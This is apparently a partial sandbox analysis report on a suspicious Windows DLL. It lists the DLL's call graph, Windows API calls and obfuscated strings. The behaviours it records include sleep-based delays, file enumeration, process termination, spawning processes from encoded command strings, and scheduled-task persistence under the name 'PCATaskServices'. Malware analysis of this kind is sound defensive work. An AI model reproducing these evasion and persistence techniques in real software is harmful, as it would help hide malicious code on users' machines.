17 API calls 14665->14668 14666->14665 14667->14659 14669 6cdfe224 __freea 17 API calls 14667->14669 14668->14667 14669->14659 14671 6ce035f5 14670->14671 14672 6ce03614 14670->14672 14671->14672 14676 6ce03920 14671->14676 14672->14624 14675 6cdfe224 __freea 17 API calls 14675->14672 14677 6ce0360e 14676->14677 14678 6ce03931 14676->14678 14677->14675 14679 6ce038fb _unexpected 17 API calls 14678->14679 14680 6ce03939 14679->14680 14681 6ce038fb _unexpected 17 API calls 14680->14681 14682 6ce03944 14681->14682 14683 6ce038fb _unexpected 17 API calls 14682->14683 14684 6ce0394f 14683->14684 14685 6ce038fb _unexpected 17 API calls 14684->14685 14686 6ce0395a 14685->14686 14687 6ce038fb _unexpected 17 API calls 14686->14687 14688 6ce03968 14687->14688 14689 6cdfe224 __freea 17 API calls 14688->14689 14690 6ce03973 14689->14690 14691 6cdfe224 __freea 17 API calls 14690->14691 14692 6ce0397e 14691->14692 14693 6cdfe224 __freea 17 API calls 14692->14693 14694 6ce03989 14693->14694 14695 6ce038fb _unexpected 17 API calls 14694->14695 14696 6ce03997 14695->14696 14697 6ce038fb _unexpected 17 API calls 14696->14697 14698 6ce039a5 14697->14698 14699 6ce038fb _unexpected 17 API calls 14698->14699 14700 6ce039b6 14699->14700 14701 6ce038fb _unexpected 17 API calls 14700->14701 14702 6ce039c4 14701->14702 14703 6ce038fb _unexpected 17 API calls 14702->14703 14704 6ce039d2 14703->14704 14705 6cdfe224 __freea 17 API calls 14704->14705 14706 6ce039dd 14705->14706 14707 6cdfe224 __freea 17 API calls 14706->14707 14708 6ce039e8 14707->14708 14709 6cdfe224 __freea 17 API calls 14708->14709 14710 6ce039f3 14709->14710 14711 6cdfe224 __freea 17 API calls 14710->14711 14711->14677 14712->14601 14714 6cdf341b 14713->14714 14715 6cdf4420 14713->14715 14714->14352 14721 6cdf5623 14715->14721 14718 6cdf565e ___vcrt_FlsSetValue 7 API calls 14719 6cdf4436 14718->14719 14727 6cdf43fa 14719->14727 14722 6cdf54c2 ___vcrt_FlsFree 5 API calls 14721->14722 14723 6cdf563d 14722->14723 14724 6cdf5649 mydllmain 14723->14724 14725 6cdf5655 TlsGetValue 14723->14725 14726 6cdf4427 14724->14726 14725->14726 14726->14718 14728 6cdf4404 14727->14728 14729 6cdf4411 14727->14729 14728->14729 14730 6cdfb786 ___std_exception_copy 17 API calls 14728->14730 14729->14714 14730->14729 14737 6cdf444f 14731->14737 14733 6cdf33f7 14733->14387 14734 6cdfca94 14733->14734 14735 6cdfd3c8 __dosmaperr 17 API calls 14734->14735 14736 6cdf3403 14735->14736 14736->14384 14736->14386 14738 6cdf445b GetLastError 14737->14738 14739 6cdf4458 14737->14739 14740 6cdf5623 ___vcrt_FlsGetValue 7 API calls 14738->14740 14739->14733 14741 6cdf4470 14740->14741 14742 6cdf44d5 SetLastError 14741->14742 14743 6cdf565e ___vcrt_FlsSetValue 7 API calls 14741->14743 14750 6cdf448f 14741->14750 14742->14733 14744 6cdf4489 __FrameHandler3::FrameUnwindToState 14743->14744 14745 6cdf44b1 14744->14745 14746 6cdf565e ___vcrt_FlsSetValue 7 API calls 14744->14746 14744->14750 14747 6cdf565e ___vcrt_FlsSetValue 7 API calls 14745->14747 14748 6cdf44c5 14745->14748 14746->14745 14747->14748 14749 6cdfb786 ___std_exception_copy 17 API calls 14748->14749 14749->14750 14750->14742

                  Executed Functions

                  Function 6CDF15A4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141fileCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • FindFirstFileW.KERNELBASE(?,00000000,FAB51140,000003E8,00000000,00000000,?,6CE0A62A,000000FF), ref: 6CDF165C
                  • TerminateProcess.KERNEL32(00000000), ref: 6CDF171F
                  • CloseHandle.KERNEL32 ref: 6CDF172B
                  • CloseHandle.KERNEL32 ref: 6CDF1737
                    • Part of subcall function 6CDF1795: __fread_nolock.LIBCMT ref: 6CDF1871
                  • FindNextFileW.KERNELBASE(00000000,00000000), ref: 6CDF1753
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: CloseFileFindHandle$FirstNextProcessTerminate__fread_nolock
                  • String ID: %s\%s$%s\*.*
                  • API String ID: 859259384-1665845743
                  • Opcode ID: daa46c265728f1e10271b7be5fa1ecebb2950890d2d91d0af766eb5ac405411b
                  • Instruction ID: 5e7857db29002d19b6464a18beda198aed04040c2ba8fcc881a50b29a8f28aa3
                  • Opcode Fuzzy Hash: daa46c265728f1e10271b7be5fa1ecebb2950890d2d91d0af766eb5ac405411b
                  • Instruction Fuzzy Hash: 9351D9B1A00288EBDF60DF65CC44BDD77B8FF48318F05452AE928D76A0DB749A49CB50
                  Function 6CDF2808 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 175sleepCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetEnvironmentVariableW.KERNEL32(?,?,00000032,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6CDF28A9
                  • Sleep.KERNELBASE(000005DC,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6CDF28C4
                  • Sleep.KERNELBASE(00007530,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6CDF28CB
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6CDF2A0E
                  Strings
                  • IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B, xrefs: 6CDF2997
                  • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6CDF2933
                  • %s%s, xrefs: 6CDF2916, 6CDF297A
                  • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6CDF2833
                  • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6CDF28CD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: EnvironmentSleep$ExpandStringsVariable
                  • String ID: %s%s$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
                  • API String ID: 861455210-3053068940
                  • Opcode ID: 849225d2624ff1fcbfb769b65df20eb43f01b53e5362d9c6911dbae3b889e611
                  • Instruction ID: 8b2cce811761a3b0ae0293af001adb6dda5805146fd3fb706382c418740a64f2
                  • Opcode Fuzzy Hash: 849225d2624ff1fcbfb769b65df20eb43f01b53e5362d9c6911dbae3b889e611
                  • Instruction Fuzzy Hash: E6515FB1408385AAC725DF60DC44DEBB7FCFF85208F41491EA9A587650DB35A60ECBA2
                  Function 6CDF2EF3 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • __RTC_Initialize.LIBCMT ref: 6CDF2F3A
                  • ___scrt_uninitialize_crt.LIBCMT ref: 6CDF2F54
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: Initialize___scrt_uninitialize_crt
                  • String ID:
                  • API String ID: 2442719207-0
                  • Opcode ID: 26d0c6b1ed7d015f48c3559dcff077247d3b9d3f0409c5009c3922b891adb4be
                  • Instruction ID: 13b978d1b5449cba21717cfc14234ee8deeaf57e55d314901adf2f81ecbec747
                  • Opcode Fuzzy Hash: 26d0c6b1ed7d015f48c3559dcff077247d3b9d3f0409c5009c3922b891adb4be
                  • Instruction Fuzzy Hash: 5341E4B2E15654EBDB208F66CC04B9E7AB4FF8475CF134116E8345BB60D73089078BA1
                  Function 6CDF141E Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125sleepprocessCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • Sleep.KERNELBASE(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BfdAoBKRBZRA{B@7BgBA7BKRB,?), ref: 6CDF1560
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6CE14454), ref: 6CDF1583
                  Strings
                  • %s %s, xrefs: 6CDF1545
                  • TDl, xrefs: 6CDF14C0
                  • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BfdAoBKRBZRA{B@7BgBA7BKRB, xrefs: 6CDF14C5
                  • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6CDF1448
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: CreateProcessSleep
                  • String ID: %s %s$TDl$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BfdAoBKRBZRA{B@7BgBA7BKRB
                  • API String ID: 3229676899-3317557193
                  • Opcode ID: 478dc749a24c50df44ecbda8563248f8a9ba81afbeb5f1d3be66cde9e215a380
                  • Instruction ID: 07f9d998f9d597b6f556a33fbd93179fc871f09c5f8173809abb938d9037710a
                  • Opcode Fuzzy Hash: 478dc749a24c50df44ecbda8563248f8a9ba81afbeb5f1d3be66cde9e215a380
                  • Instruction Fuzzy Hash: EF4180B1508384BFD720DB64CC84EEBBBECFF89248F41491DB69586650EB34991DC7A2
                  Function 6CDF2FA3 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 160 6cdf2fa3-6cdf2fb4 call 6cdf37a0 163 6cdf2fb6-6cdf2fbc 160->163 164 6cdf2fc5-6cdf2fcc 160->164 163->164 165 6cdf2fbe-6cdf2fc0 163->165 166 6cdf2fce-6cdf2fd1 164->166 167 6cdf2fd8-6cdf2fec dllmain_raw 164->167 168 6cdf309e-6cdf30ad 165->168 166->167 169 6cdf2fd3-6cdf2fd6 166->169 170 6cdf3095-6cdf309c 167->170 171 6cdf2ff2-6cdf3003 dllmain_crt_dispatch 167->171 172 6cdf3009-6cdf301b call 6cdf1000 169->172 170->168 171->170 171->172 175 6cdf301d-6cdf301f 172->175 176 6cdf3044-6cdf3046 172->176 175->176 179 6cdf3021-6cdf303f call 6cdf1000 call 6cdf2ef3 dllmain_raw 175->179 177 6cdf304d-6cdf305e dllmain_crt_dispatch 176->177 178 6cdf3048-6cdf304b 176->178 177->170 181 6cdf3060-6cdf3092 dllmain_raw 177->181 178->170 178->177 179->176 181->170
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: dllmain_raw$dllmain_crt_dispatch
                  • String ID:
                  • API String ID: 3136044242-0
                  • Opcode ID: c8a43bad49934fcb264cb8c1e18061eb8d75ac0962ba0dfd020b45c5d0194c24
                  • Instruction ID: 7ef8648142c4f702bf3fbfdc3d79709bca4c5f14efa4f17dcaeafa7a92282e2e
                  • Opcode Fuzzy Hash: c8a43bad49934fcb264cb8c1e18061eb8d75ac0962ba0dfd020b45c5d0194c24
                  • Instruction Fuzzy Hash: 0A21A2B1901A55EADB214F56C848AAF3A79BB84B9CB174116F8345BB30D3318D038BA1
                  Function 6CDF2DEC Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • __RTC_Initialize.LIBCMT ref: 6CDF2E39
                    • Part of subcall function 6CDF373E: mydllmain.UIFTTNKL2R(00000001,00000000,00000001,6CDF2E3E,6CE11F30,00000010,6CDF2DD4,?,?,?,6CDF2FFC,?,00000001,?,?,00000001), ref: 6CDF3757
                    • Part of subcall function 6CDF3308: InitializeSListHead.KERNEL32(6CE13D50,6CDF2E43,6CE11F30,00000010,6CDF2DD4,?,?,?,6CDF2FFC,?,00000001,?,?,00000001,?,6CE11F78), ref: 6CDF330D
                    • Part of subcall function 6CDFBDF3: mydllmain.UIFTTNKL2R(?,6CDFA99A,?,6CDFC09D,6CE0B190,6CE0B194,6CE121F8,00000014,6CDFBFD5,6CE12218,00000008,6CDFC15D,6CDF63F0,?,B583E81C,FAB51140), ref: 6CDFBE0A
                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDF2EA3
                  • mydllmain.UIFTTNKL2R(?,00000002,00000001,6CE11F30,00000010,6CDF2DD4,?,?,?,6CDF2FFC,?,00000001,?,?,00000001,?), ref: 6CDF2EB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: mydllmain$Initialize$HeadList___scrt_is_nonwritable_in_current_image
                  • String ID:
                  • API String ID: 1337761313-0
                  • Opcode ID: 4d1d27d5e60e659d5763814f1b62b003545c6b113b4780351b4065580f722e51
                  • Instruction ID: fd8084bec6855278c5a31e117433fe806671f9bcc39c0c24c4d54046ad1bc58e
                  • Opcode Fuzzy Hash: 4d1d27d5e60e659d5763814f1b62b003545c6b113b4780351b4065580f722e51
                  • Instruction Fuzzy Hash: 35219232648285DADB10AFA488097DD37B0BB0632CF334519D4B167FE1CB62815AC6B2
                  Function 6CDFE038 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 228 6cdfe038-6cdfe03d 229 6cdfe03f-6cdfe057 228->229 230 6cdfe059-6cdfe05d 229->230 231 6cdfe065-6cdfe06e 229->231 230->231 232 6cdfe05f-6cdfe063 230->232 233 6cdfe080 231->233 234 6cdfe070-6cdfe073 231->234 235 6cdfe0da-6cdfe0de 232->235 238 6cdfe082-6cdfe08f GetStdHandle 233->238 236 6cdfe07c-6cdfe07e 234->236 237 6cdfe075-6cdfe07a 234->237 235->229 239 6cdfe0e4-6cdfe0e7 235->239 236->238 237->238 240 6cdfe0bc-6cdfe0ce 238->240 241 6cdfe091-6cdfe093 238->241 240->235 242 6cdfe0d0-6cdfe0d3 240->242 241->240 243 6cdfe095-6cdfe09e GetFileType 241->243 242->235 243->240 244 6cdfe0a0-6cdfe0a9 243->244 245 6cdfe0ab-6cdfe0af 244->245 246 6cdfe0b1-6cdfe0b4 244->246 245->235 246->235 247 6cdfe0b6-6cdfe0ba 246->247 247->235
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 6CDFE084
                  • GetFileType.KERNELBASE(00000000), ref: 6CDFE096
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: FileHandleType
                  • String ID:
                  • API String ID: 3000768030-0
                  • Opcode ID: 199ab6d615338126030a2d7612cf44bb45ea0061743041d8070b854fa626047e
                  • Instruction ID: 8a1c82c4ead5c40fa6b2efe564475efae3102d2701df36daa81055fd9b7a0854
                  • Opcode Fuzzy Hash: 199ab6d615338126030a2d7612cf44bb45ea0061743041d8070b854fa626047e
                  • Instruction Fuzzy Hash: FD114F71604752CAD7304B3E8888612BAB5B747378B36072EE5B6C7DF1C631D5878685
                  Function 6CE02BC2 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 248 6ce02bc2-6ce02bd0 249 6ce02bd2 248->249 250 6ce02c23 248->250 251 6ce02bd4-6ce02bd8 249->251 252 6ce02c25-6ce02c29 250->252 253 6ce02be8-6ce02bee 251->253 254 6ce02bda-6ce02bdc mydllmain 251->254 253->251 255 6ce02bf0-6ce02bf3 253->255 265 6ce02be2 call 6cdfe038 254->265 266 6ce02be2 call 6cdfe0e8 254->266 255->250 256 6ce02bf5-6ce02bf7 255->256 258 6ce02bf9 256->258 259 6ce02c1f-6ce02c21 256->259 257 6ce02be4-6ce02be6 257->253 257->255 260 6ce02bfc-6ce02c00 258->260 259->252 261 6ce02c02-6ce02c06 260->261 262 6ce02c15-6ce02c1d 260->262 261->262 263 6ce02c08-6ce02c14 mydllmain 261->263 262->259 262->260 263->262 265->257 266->257
                  APIs
                  • mydllmain.UIFTTNKL2R(00000001,00000000,?,?,6CDFCA91,6CE0C018,6CE0C098,6CDF34A9,?,6CDF2DFF,00000000,6CE11F30,00000010,6CDF2DD4,?,?), ref: 6CE02BDC
                  • mydllmain.UIFTTNKL2R(00000000,00000001,00000000,?,?,6CDFCA91,6CE0C018,6CE0C098,6CDF34A9,?,6CDF2DFF,00000000,6CE11F30,00000010,6CDF2DD4,?), ref: 6CE02C0C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: mydllmain
                  • String ID:
                  • API String ID: 979097349-0
                  • Opcode ID: 99bbc9c6ab41ddd7df5890e24760d4460ddc039b2f32ff80c619709b86dcc19c
                  • Instruction ID: 40736e12b38af0da6fbc335411863b2a5101544a3fa53fe23e2a9029e89fb745
                  • Opcode Fuzzy Hash: 99bbc9c6ab41ddd7df5890e24760d4460ddc039b2f32ff80c619709b86dcc19c
                  • Instruction Fuzzy Hash: 5301DB33B0121457DF109E1998CD19AB7F59FE126CB310529DC79A7B41CB31AC9586D0
                  Function 6CDFF70A Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 267 6cdff70a-6cdff715 268 6cdff717-6cdff721 267->268 269 6cdff723-6cdff729 267->269 268->269 270 6cdff757-6cdff762 call 6cdfe211 268->270 271 6cdff72b-6cdff72c 269->271 272 6cdff742-6cdff753 RtlAllocateHeap 269->272 276 6cdff764-6cdff766 270->276 271->272 274 6cdff72e-6cdff735 call 6ce03b7b 272->274 275 6cdff755 272->275 274->270 280 6cdff737-6cdff740 call 6cdfbd70 274->280 275->276 280->270 280->272
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000001,6CDFA99A,?,6CDFD4BC,00000001,00000364,00000007,000000FF,6CDFA99A,6CDFA99A,?,6CDF63BF,6CDFBC5B,F08BD84D), ref: 6CDFF74B
                    • Part of subcall function 6CDFBD70: mydllmain.UIFTTNKL2R(?,00000001,?,6CDFF73D,00000001,?,6CDFD4BC,00000001,00000364,00000007,000000FF,6CDFA99A,6CDFA99A,?,6CDF63BF,6CDFBC5B), ref: 6CDFBD86
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: AllocateHeapmydllmain
                  • String ID:
                  • API String ID: 2479503475-0
                  • Opcode ID: bfd5800c5a423075de42b64c972f9174cddec28a1c356965bd3fab79a8a93548
                  • Instruction ID: 78e0622c574e678d65a2eb428d7066db5ff0d62a3163d17a202d487e3568b6ae
                  • Opcode Fuzzy Hash: bfd5800c5a423075de42b64c972f9174cddec28a1c356965bd3fab79a8a93548
                  • Instruction Fuzzy Hash: 94F0B431645628E6EB016BA69C40A9AB7E8BB41768B268015AC34E7DA0CB30D917C6E1
                  Function 6CDF1000 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 283 6cdf1000-6cdf1005 284 6cdf100d-6cdf1014 call 6cdf2808 ExitProcess 283->284 285 6cdf1007-6cdf100a 283->285
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 8731eebefaf75133d75445b54be57ed9d2ca1ae2cb0e9188cbb7d4ec126d73d6
                  • Instruction ID: 843ab81ce087ceb500f280a798c7b6aa4360eacd78d4853cd95031ee7ee6a3e7
                  • Opcode Fuzzy Hash: 8731eebefaf75133d75445b54be57ed9d2ca1ae2cb0e9188cbb7d4ec126d73d6
                  • Instruction Fuzzy Hash: EBB09231A95281D6C240A760844CB2AB6A4BF6234FF29C428E07980560CB2180AA9632

                  Non-executed Functions

                  Function 6CDF1C39 Relevance: 70.6, APIs: 18, Strings: 22, Instructions: 615comCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 6CDF1C76
                  • CoCreateInstance.OLE32(6CE0B200,00000000,00000001,6CE0B1F0,?), ref: 6CDF1C8F
                  • CoUninitialize.OLE32 ref: 6CDF1CA6
                  • VariantInit.OLEAUT32(?), ref: 6CDF1CCD
                  • VariantInit.OLEAUT32(?), ref: 6CDF1CE1
                  • VariantInit.OLEAUT32(?), ref: 6CDF1CF5
                  • VariantInit.OLEAUT32(?), ref: 6CDF1D09
                  • VariantClear.OLEAUT32(?), ref: 6CDF1D58
                  • VariantClear.OLEAUT32(?), ref: 6CDF1D5E
                  • VariantClear.OLEAUT32(?), ref: 6CDF1D64
                  • VariantClear.OLEAUT32(?), ref: 6CDF1D6E
                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,00000003,?,?,?,PCATaskServices), ref: 6CDF21E8
                  Strings
                  • QueryInterface call failed for IExecAction: %x, xrefs: 6CDF2058
                  • Cannot get Root Folder pointer: %x, xrefs: 6CDF1DCE
                  • Cannot get trigger collection: %x, xrefs: 6CDF1EE3
                  • Cannot put trigger ID: %x, xrefs: 6CDF1F81
                  • Success! Task successfully registered. , xrefs: 6CDF21F0
                  • Cannot create action: %x, xrefs: 6CDF202A
                  • Failed to create an instance of ITaskService: %x, xrefs: 6CDF1C9A
                  • PCATaskServices, xrefs: 6CDF2149
                  • Cannot get settings pointer: %x, xrefs: 6CDF1E8B
                  • Cannot put identification info: %x, xrefs: 6CDF1E6C
                  • Failed to create a task definition: %x, xrefs: 6CDF1DF6
                  • Cannot put setting info: %x, xrefs: 6CDF1EC4
                  • Cannot put registration trigger delay: %x, xrefs: 6CDF1FE0
                  • Error saving the Task : %x, xrefs: 6CDF21CA
